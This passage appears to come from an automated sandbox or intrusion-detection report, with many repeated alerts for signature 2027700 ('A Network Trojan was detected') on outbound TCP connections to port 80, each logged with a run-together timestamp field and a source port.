                            Source Port:49770
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449983802027700 02/07/23-19:58:21.153208
                            SID:2027700
                            Source Port:49983
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450227802027700 02/07/23-19:59:30.297316
                            SID:2027700
                            Source Port:50227
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450222802027700 02/07/23-19:59:29.105694
                            SID:2027700
                            Source Port:50222
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449739802027700 02/07/23-19:57:15.413161
                            SID:2027700
                            Source Port:49739
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450185802027700 02/07/23-19:59:17.468502
                            SID:2027700
                            Source Port:50185
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450381802027700 02/07/23-20:00:11.899082
                            SID:2027700
                            Source Port:50381
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449898802027700 02/07/23-19:57:58.651415
                            SID:2027700
                            Source Port:49898
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450317802027700 02/07/23-19:59:54.125434
                            SID:2027700
                            Source Port:50317
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450104802027700 02/07/23-19:58:55.183792
                            SID:2027700
                            Source Port:50104
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450358802027700 02/07/23-20:00:06.314097
                            SID:2027700
                            Source Port:50358
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449857802027700 02/07/23-19:57:48.874538
                            SID:2027700
                            Source Port:49857
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449893802027700 02/07/23-19:57:57.434157
                            SID:2027700
                            Source Port:49893
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449935802027700 02/07/23-19:58:09.870706
                            SID:2027700
                            Source Port:49935
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449697802027700 02/07/23-19:57:03.625893
                            SID:2027700
                            Source Port:49697
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450026802027700 02/07/23-19:58:34.056162
                            SID:2027700
                            Source Port:50026
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450067802027700 02/07/23-19:58:46.185179
                            SID:2027700
                            Source Port:50067
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450263802027700 02/07/23-19:59:38.967068
                            SID:2027700
                            Source Port:50263
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450373802027700 02/07/23-20:00:09.942649
                            SID:2027700
                            Source Port:50373
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449754802027700 02/07/23-19:57:18.680477
                            SID:2027700
                            Source Port:49754
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449852802027700 02/07/23-19:57:46.015163
                            SID:2027700
                            Source Port:49852
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450082802027700 02/07/23-19:58:49.824851
                            SID:2027700
                            Source Port:50082
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450410802027700 02/07/23-20:00:18.845590
                            SID:2027700
                            Source Port:50410
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449840802027700 02/07/23-19:57:41.244153
                            SID:2027700
                            Source Port:49840
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450079802027700 02/07/23-19:58:49.105142
                            SID:2027700
                            Source Port:50079
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450202802027700 02/07/23-19:59:21.791441
                            SID:2027700
                            Source Port:50202
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450300802027700 02/07/23-19:59:50.001268
                            SID:2027700
                            Source Port:50300
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450018802027700 02/07/23-19:58:32.051728
                            SID:2027700
                            Source Port:50018
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450198802027700 02/07/23-19:59:20.390515
                            SID:2027700
                            Source Port:50198
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450116802027700 02/07/23-19:58:58.086949
                            SID:2027700
                            Source Port:50116
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449907802027700 02/07/23-19:58:00.832041
                            SID:2027700
                            Source Port:49907
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449787802027700 02/07/23-19:57:28.606188
                            SID:2027700
                            Source Port:49787
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450428802027700 02/07/23-20:00:25.267783
                            SID:2027700
                            Source Port:50428
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449910802027700 02/07/23-19:58:01.546921
                            SID:2027700
                            Source Port:49910
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450345802027700 02/07/23-20:00:01.959618
                            SID:2027700
                            Source Port:50345
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449782802027700 02/07/23-19:57:25.569842
                            SID:2027700
                            Source Port:49782
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449824802027700 02/07/23-19:57:37.320314
                            SID:2027700
                            Source Port:49824
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450152802027700 02/07/23-19:59:09.531894
                            SID:2027700
                            Source Port:50152
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449809802027700 02/07/23-19:57:33.899731
                            SID:2027700
                            Source Port:49809
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450235802027700 02/07/23-19:59:32.185122
                            SID:2027700
                            Source Port:50235
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449726802027700 02/07/23-19:57:12.281502
                            SID:2027700
                            Source Port:49726
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450054802027700 02/07/23-19:58:40.604509
                            SID:2027700
                            Source Port:50054
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450309802027700 02/07/23-19:59:52.188472
                            SID:2027700
                            Source Port:50309
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450407802027700 02/07/23-20:00:18.142047
                            SID:2027700
                            Source Port:50407
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450137802027700 02/07/23-19:59:06.138198
                            SID:2027700
                            Source Port:50137
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449902802027700 02/07/23-19:57:59.605442
                            SID:2027700
                            Source Port:49902
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450230802027700 02/07/23-19:59:30.997466
                            SID:2027700
                            Source Port:50230
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449865802027700 02/07/23-19:57:50.851457
                            SID:2027700
                            Source Port:49865
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449943802027700 02/07/23-19:58:11.590299
                            SID:2027700
                            Source Port:49943
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450443802027700 02/07/23-20:00:28.848844
                            SID:2027700
                            Source Port:50443
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450271802027700 02/07/23-19:59:41.182547
                            SID:2027700
                            Source Port:50271
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449790802027700 02/07/23-19:57:29.323510
                            SID:2027700
                            Source Port:49790
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450087802027700 02/07/23-19:58:51.030172
                            SID:2027700
                            Source Port:50087
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450129802027700 02/07/23-19:59:01.428744
                            SID:2027700
                            Source Port:50129
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450046802027700 02/07/23-19:58:38.668972
                            SID:2027700
                            Source Port:50046
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449873802027700 02/07/23-19:57:52.544613
                            SID:2027700
                            Source Port:49873
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450415802027700 02/07/23-20:00:21.209012
                            SID:2027700
                            Source Port:50415
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449795802027700 02/07/23-19:57:30.522001
                            SID:2027700
                            Source Port:49795
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449878802027700 02/07/23-19:57:53.715011
                            SID:2027700
                            Source Port:49878
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449837802027700 02/07/23-19:57:40.510394
                            SID:2027700
                            Source Port:49837
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450165802027700 02/07/23-19:59:12.675415
                            SID:2027700
                            Source Port:50165
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450378802027700 02/07/23-20:00:11.173249
                            SID:2027700
                            Source Port:50378
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450124802027700 02/07/23-19:59:00.013175
                            SID:2027700
                            Source Port:50124
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450337802027700 02/07/23-19:59:58.938844
                            SID:2027700
                            Source Port:50337
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450207802027700 02/07/23-19:59:25.359503
                            SID:2027700
                            Source Port:50207
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450341802027700 02/07/23-20:00:00.154878
                            SID:2027700
                            Source Port:50341
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449722802027700 02/07/23-19:57:11.275289
                            SID:2027700
                            Source Port:49722
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449976802027700 02/07/23-19:58:19.455952
                            SID:2027700
                            Source Port:49976
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450436802027700 02/07/23-20:00:27.196537
                            SID:2027700
                            Source Port:50436
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450430802027700 02/07/23-20:00:25.739838
                            SID:2027700
                            Source Port:50430
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449719802027700 02/07/23-19:57:10.555436
                            SID:2027700
                            Source Port:49719
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450338802027700 02/07/23-19:59:59.187277
                            SID:2027700
                            Source Port:50338
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450427802027700 02/07/23-20:00:25.032850
                            SID:2027700
                            Source Port:50427
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449808802027700 02/07/23-19:57:33.669443
                            SID:2027700
                            Source Port:49808
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449906802027700 02/07/23-19:58:00.574287
                            SID:2027700
                            Source Port:49906
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449817802027700 02/07/23-19:57:35.876380
                            SID:2027700
                            Source Port:49817
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450329802027700 02/07/23-19:59:57.013885
                            SID:2027700
                            Source Port:50329
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450074802027700 02/07/23-19:58:47.870199
                            SID:2027700
                            Source Port:50074
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449915802027700 02/07/23-19:58:02.781708
                            SID:2027700
                            Source Port:49915
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450172802027700 02/07/23-19:59:14.371003
                            SID:2027700
                            Source Port:50172
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450013802027700 02/07/23-19:58:30.820175
                            SID:2027700
                            Source Port:50013
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450270802027700 02/07/23-19:59:40.657861
                            SID:2027700
                            Source Port:50270
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449948802027700 02/07/23-19:58:12.777625
                            SID:2027700
                            Source Port:49948
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450083802027700 02/07/23-19:58:50.074970
                            SID:2027700
                            Source Port:50083
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450402802027700 02/07/23-20:00:16.938938
                            SID:2027700
                            Source Port:50402
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450169802027700 02/07/23-19:59:13.653163
                            SID:2027700
                            Source Port:50169
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449750802027700 02/07/23-19:57:18.108794
                            SID:2027700
                            Source Port:49750
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450267802027700 02/07/23-19:59:39.920444
                            SID:2027700
                            Source Port:50267
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449741802027700 02/07/23-19:57:15.910290
                            SID:2027700
                            Source Port:49741
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450178802027700 02/07/23-19:59:15.810186
                            SID:2027700
                            Source Port:50178
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450109802027700 02/07/23-19:58:56.416170
                            SID:2027700
                            Source Port:50109
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450103802027700 02/07/23-19:58:54.948416
                            SID:2027700
                            Source Port:50103
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450268802027700 02/07/23-19:59:40.160557
                            SID:2027700
                            Source Port:50268
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450357802027700 02/07/23-20:00:06.081116
                            SID:2027700
                            Source Port:50357
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449779802027700 02/07/23-19:57:24.309471
                            SID:2027700
                            Source Port:49779
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449934802027700 02/07/23-19:58:09.625815
                            SID:2027700
                            Source Port:49934
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449738802027700 02/07/23-19:57:15.178369
                            SID:2027700
                            Source Port:49738
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450014802027700 02/07/23-19:58:31.062717
                            SID:2027700
                            Source Port:50014
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449975802027700 02/07/23-19:58:19.199653
                            SID:2027700
                            Source Port:49975
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450210802027700 02/07/23-19:59:26.169613
                            SID:2027700
                            Source Port:50210
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450411802027700 02/07/23-20:00:19.306270
                            SID:2027700
                            Source Port:50411
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450464802027700 02/07/23-20:00:33.699108
                            SID:2027700
                            Source Port:50464
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450055802027700 02/07/23-19:58:40.841197
                            SID:2027700
                            Source Port:50055
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450144802027700 02/07/23-19:59:07.591286
                            SID:2027700
                            Source Port:50144
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450181802027700 02/07/23-19:59:16.514939
                            SID:2027700
                            Source Port:50181
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450340802027700 02/07/23-19:59:59.670957
                            SID:2027700
                            Source Port:50340
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449721802027700 02/07/23-19:57:11.038423
                            SID:2027700
                            Source Port:49721
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449886802027700 02/07/23-19:57:55.680683
                            SID:2027700
                            Source Port:49886
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450398802027700 02/07/23-20:00:15.996201
                            SID:2027700
                            Source Port:50398
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449845802027700 02/07/23-19:57:42.455705
                            SID:2027700
                            Source Port:49845
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450251802027700 02/07/23-19:59:36.032976
                            SID:2027700
                            Source Port:50251
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450197802027700 02/07/23-19:59:20.137780
                            SID:2027700
                            Source Port:50197
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450239802027700 02/07/23-19:59:33.185655
                            SID:2027700
                            Source Port:50239
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449811802027700 02/07/23-19:57:34.389822
                            SID:2027700
                            Source Port:49811
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450379802027700 02/07/23-20:00:11.418266
                            SID:2027700
                            Source Port:50379
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449947802027700 02/07/23-19:58:12.542504
                            SID:2027700
                            Source Port:49947
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450214802027700 02/07/23-19:59:27.169597
                            SID:2027700
                            Source Port:50214
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450128802027700 02/07/23-19:59:00.987231
                            SID:2027700
                            Source Port:50128
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450312802027700 02/07/23-19:59:52.924013
                            SID:2027700
                            Source Port:50312
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450468802027700 02/07/23-20:00:34.647098
                            SID:2027700
                            Source Port:50468
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450125802027700 02/07/23-19:59:00.262200
                            SID:2027700
                            Source Port:50125
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450223802027700 02/07/23-19:59:29.342199
                            SID:2027700
                            Source Port:50223
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449864802027700 02/07/23-19:57:50.603717
                            SID:2027700
                            Source Port:49864
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450131802027700 02/07/23-19:59:02.039230
                            SID:2027700
                            Source Port:50131
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450385802027700 02/07/23-20:00:12.863067
                            SID:2027700
                            Source Port:50385
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449766802027700 02/07/23-19:57:21.096100
                            SID:2027700
                            Source Port:49766
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450070802027700 02/07/23-19:58:46.903603
                            SID:2027700
                            Source Port:50070
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449849802027700 02/07/23-19:57:43.984219
                            SID:2027700
                            Source Port:49849
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449775802027700 02/07/23-19:57:23.025798
                            SID:2027700
                            Source Port:49775
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449858802027700 02/07/23-19:57:49.109185
                            SID:2027700
                            Source Port:49858
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449794802027700 02/07/23-19:57:30.288757
                            SID:2027700
                            Source Port:49794
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450140802027700 02/07/23-19:59:06.654084
                            SID:2027700
                            Source Port:50140
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450394802027700 02/07/23-20:00:15.033222
                            SID:2027700
                            Source Port:50394
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449791802027700 02/07/23-19:57:29.556151
                            SID:2027700
                            Source Port:49791
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450042802027700 02/07/23-19:58:37.715383
                            SID:2027700
                            Source Port:50042
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450296802027700 02/07/23-19:59:49.030441
                            SID:2027700
                            Source Port:50296
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450039802027700 02/07/23-19:58:36.996099
                            SID:2027700
                            Source Port:50039
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449922802027700 02/07/23-19:58:06.074309
                            SID:2027700
                            Source Port:49922
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449880802027700 02/07/23-19:57:54.223863
                            SID:2027700
                            Source Port:49880
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449931802027700 02/07/23-19:58:08.920914
                            SID:2027700
                            Source Port:49931
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450455802027700 02/07/23-20:00:31.736851
                            SID:2027700
                            Source Port:50455
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450201802027700 02/07/23-19:59:21.107449
                            SID:2027700
                            Source Port:50201
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450325802027700 02/07/23-19:59:56.050545
                            SID:2027700
                            Source Port:50325
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449836802027700 02/07/23-19:57:40.268244
                            SID:2027700
                            Source Port:49836
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450366802027700 02/07/23-20:00:08.251401
                            SID:2027700
                            Source Port:50366
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450449802027700 02/07/23-20:00:30.317849
                            SID:2027700
                            Source Port:50449
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450242802027700 02/07/23-19:59:33.886857
                            SID:2027700
                            Source Port:50242
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450414802027700 02/07/23-20:00:20.800586
                            SID:2027700
                            Source Port:50414
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450112802027700 02/07/23-19:58:57.136239
                            SID:2027700
                            Source Port:50112
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449877802027700 02/07/23-19:57:53.477790
                            SID:2027700
                            Source Port:49877
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449706802027700 02/07/23-19:57:08.141498
                            SID:2027700
                            Source Port:49706
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449919802027700 02/07/23-19:58:03.999927
                            SID:2027700
                            Source Port:49919
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
